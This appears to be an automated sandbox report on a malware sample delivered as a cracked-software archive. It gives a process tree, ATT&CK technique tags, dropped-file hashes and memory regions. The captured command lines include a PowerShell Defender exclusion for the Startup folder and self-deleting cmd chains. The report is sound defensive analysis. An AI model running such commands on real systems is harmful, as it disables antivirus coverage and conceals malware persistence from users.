- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\ProgramData\97BC.tmp.exe
"C:\ProgramData\97BC.tmp.exe"
3⤵
- Drops startup file
- Executes dropped EXE
PID:4896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe" >> NUL
3⤵
PID:1840

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:3744

C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 444
3⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 764
3⤵
- Program crash
PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 772
3⤵
- Program crash
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 820
3⤵
- Program crash
PID:1152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 828
3⤵
- Program crash
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 832
3⤵
- Program crash
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 844
3⤵
- Program crash
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1356
3⤵
- Program crash
PID:776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe" & exit
3⤵
PID:2588

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "lower.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 492
3⤵
- Program crash
PID:3904

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:3308

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 600
3⤵
- Program crash
PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1876 -ip 1876
1⤵
PID:4580

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:5080

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
2⤵
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2256 -ip 2256
1⤵
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2256 -ip 2256
1⤵
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2256 -ip 2256
1⤵
PID:892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2256 -ip 2256
1⤵
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2256 -ip 2256
1⤵
PID:2532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2256 -ip 2256
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2256 -ip 2256
1⤵
PID:2476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2256 -ip 2256
1⤵
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2256 -ip 2256
1⤵
PID:4572

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3978055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\97BC.tmp.exe
Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\ProgramData\97BC.tmp.exe
Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\ProgramData\97BC.tmp.exe
Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
369e57f34a022b84c9f72fee1e61af8f

SHA1
f875bfbe58f54ae2f302abf770bff6fd54604315

SHA256
402c3a8ef864edc7fe1e90d6e61424ab9c27630663d4a02f76ef60e6f14f71ea

SHA512
a23178cad064563340be6534df75a921507db81976e48fe9e0b006c67bc7ad651a1c8ef4ec102df11e3c79a2c058ed36a0decb8fa405aa52c09a664b84c4742b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
Filesize
328KB

MD5
f1f0582d8f6efa3a8e0990e7dbe6e028

SHA1
659b5f74855b1390f6cf68da0853c1ca84bdcde5

SHA256
0966169857ab598999abfae32da308011b74bd85d66324c4189a534aef6556ab

SHA512
b034efdfedcca6176349dc53571a79b74a5deb8e1592cc2f48fbaacf3a5d7b1457a2577fd94081e6cda54c1f3d651a29c02db6fe04ca6005bad57078de406286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
Filesize
157KB

MD5
53f9c2f2f1a755fc04130fd5e9fcaff4

SHA1
3f517b5b64080dee853fc875921ba7c17cdc9169

SHA256
e37fb761922a83426384d20cf959ea563df4575e6b9d4387f06129a47e7f848e

SHA512
77c1247168dd1dc905ccddac4c9a7c1c85460094003a35d3ac4ed429c4283ae1b085fad3d7f30d0470a565ddedb3b514d28518aaac7e045d2c73d4fea4290e46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
Filesize
253KB

MD5
a75d09194eb66fc6992fae1f099890a1

SHA1
65ced0cbd7c9f8bf79356f1647b62747a4cce595

SHA256
d17028aba6bb98a1741d2a73760fb2c9af0a557eb0379abd33db9746329c0d48

SHA512
d4c6c97f423391aeaf4300a5d72707f6b1caa39ec79a59a01f70669ce7a995610df54285e5b5f82d9bbb436bd2fd7f3f8db9622fcf1c63710d12422cedad0f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
Filesize
253KB

MD5
a75d09194eb66fc6992fae1f099890a1

SHA1
65ced0cbd7c9f8bf79356f1647b62747a4cce595

SHA256
d17028aba6bb98a1741d2a73760fb2c9af0a557eb0379abd33db9746329c0d48

SHA512
d4c6c97f423391aeaf4300a5d72707f6b1caa39ec79a59a01f70669ce7a995610df54285e5b5f82d9bbb436bd2fd7f3f8db9622fcf1c63710d12422cedad0f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
Filesize
253KB

MD5
a75d09194eb66fc6992fae1f099890a1

SHA1
65ced0cbd7c9f8bf79356f1647b62747a4cce595

SHA256
d17028aba6bb98a1741d2a73760fb2c9af0a557eb0379abd33db9746329c0d48

SHA512
d4c6c97f423391aeaf4300a5d72707f6b1caa39ec79a59a01f70669ce7a995610df54285e5b5f82d9bbb436bd2fd7f3f8db9622fcf1c63710d12422cedad0f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe
Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe
Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe
Filesize
689KB

MD5
ecb748776381767e2bf8190afe21b5d6

SHA1
f9b1f93511f24ad0da7b5cde023818ffe5742cf5

SHA256
7dd0d3973e4d69c46be5baa7013cf4554638e789385fbc2007df7a7acbb25dec

SHA512
9e775258a575d21f0ac097350a81db8ad855d405f9e726b8333c1ceb136d2f00f553d5a1eba0eb02328638bd7f0276ac6c37f8ed11f11630ee9e5a4e0ecd6a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
Filesize
143KB

MD5
adb23e89bdd7271cf60ab840a0b471e8

SHA1
09b3e484dfbe5b158cb3de7a946c20182fb39653

SHA256
6d28deca7ca1326a90d5a1dc33120ec13ef44612608c4f24aeea7b88ab03cb1e

SHA512
8f161395c9410cb86e0035e3b2cf24d106cf73a2259a89947172efd7f02178e733893549957d2c68d935430df4f68cba30c23abb5ace5d59c68316090d3a272b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
Filesize
143KB

MD5
adb23e89bdd7271cf60ab840a0b471e8

SHA1
09b3e484dfbe5b158cb3de7a946c20182fb39653

SHA256
6d28deca7ca1326a90d5a1dc33120ec13ef44612608c4f24aeea7b88ab03cb1e

SHA512
8f161395c9410cb86e0035e3b2cf24d106cf73a2259a89947172efd7f02178e733893549957d2c68d935430df4f68cba30c23abb5ace5d59c68316090d3a272b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
Filesize
143KB

MD5
adb23e89bdd7271cf60ab840a0b471e8

SHA1
09b3e484dfbe5b158cb3de7a946c20182fb39653

SHA256
6d28deca7ca1326a90d5a1dc33120ec13ef44612608c4f24aeea7b88ab03cb1e

SHA512
8f161395c9410cb86e0035e3b2cf24d106cf73a2259a89947172efd7f02178e733893549957d2c68d935430df4f68cba30c23abb5ace5d59c68316090d3a272b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gbq54v4.x02.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
01adcaf961bf2a3c4b2097a8b4cf38e7

SHA1
f6ac5fc466f834fca07a7f440bd34da76ebc5ca7

SHA256
5db86112c460dcac32890808ebeac8e10c06c1aea9bec01fb9d7c539ba6193c8

SHA512
af86c935eff30f2d28e597c3f3dc02a47435729b7616c1bab5059d6574e0af97648de07cc858ccf101e993c355509f743a107a67b769575dcdbc0d54bd875b21

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
memory/828-274-0x000002B7ED7C0000-0x000002B7ED7D0000-memory.dmp

Filesize
64KB

Download
memory/828-273-0x000002B7ED7C0000-0x000002B7ED7D0000-memory.dmp

Filesize
64KB

Download
memory/900-218-0x0000000000F40000-0x0000000000F6E000-memory.dmp

Filesize
184KB

Download
memory/900-220-0x000000001C9B0000-0x000000001C9C0000-memory.dmp

Filesize
64KB

Download
memory/956-184-0x0000029D26740000-0x0000029D26762000-memory.dmp

Filesize
136KB

Download
memory/956-219-0x0000029D27250000-0x0000029D272A0000-memory.dmp

Filesize
320KB

Download
memory/956-206-0x0000029D25950000-0x0000029D25960000-memory.dmp

Filesize
64KB

Download
memory/956-182-0x0000029D26770000-0x0000029D267F2000-memory.dmp

Filesize
520KB

Download
memory/956-193-0x0000029D266E0000-0x0000029D266F0000-memory.dmp

Filesize
64KB

Download
memory/956-205-0x0000029D25950000-0x0000029D25960000-memory.dmp

Filesize
64KB

Download
memory/956-207-0x0000029D25950000-0x0000029D25960000-memory.dmp

Filesize
64KB

Download
memory/2256-262-0x0000000002100000-0x0000000002140000-memory.dmp

Filesize
256KB

Download
memory/2256-281-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/4052-168-0x0000028123AA0000-0x0000028123BA2000-memory.dmp

Filesize
1.0MB

Download
memory/4052-167-0x0000028108B70000-0x0000028108B80000-memory.dmp

Filesize
64KB

Download
memory/4052-166-0x0000028108750000-0x0000028108802000-memory.dmp

Filesize
712KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads